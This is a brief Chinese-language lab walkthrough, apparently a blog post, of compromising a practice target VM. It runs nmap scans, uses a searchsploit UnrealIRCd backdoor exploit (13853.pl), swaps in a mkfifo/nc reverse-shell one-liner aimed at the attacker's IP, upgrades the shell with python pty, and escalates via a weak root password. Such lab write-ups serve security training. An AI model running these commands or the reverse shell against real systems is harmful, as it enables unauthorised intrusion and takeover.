靶机ip:172.16.33.78
突破
端口扫描
sudo nmap -p- 172.16.33.78 --open
结果如下:
特定端口扫描
sudo nmap -p6667,6697,8067 -sV -A 172.16.33.78
结果如下:
针对陌生端口
首先想到用searchsploit:
searchsploit unrealircd
选择13853.pl
searchsploit -m 13853
查看其内容,将其中的payload<1>改成反弹脚本:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <本地ip> <反弹端口号> > /tmp/f
(打码内容为本地机ip)
之后按照代码中的usage提示正确使用该脚本,做好监听
perl 13853.pl 172.16.33.78 <三个端口均可> 1
点击发送,反弹成功,突破完成。
(注:由于本人取材发博客时该靶机出了些问题导致没有反弹成功,故没有突破成功的截图,望谅解。)
提权
升级终端
python3 -c 'import pty;pty.spawn("/bin/bash")'
弱口令提权
su
root
提权成功,打靶完成。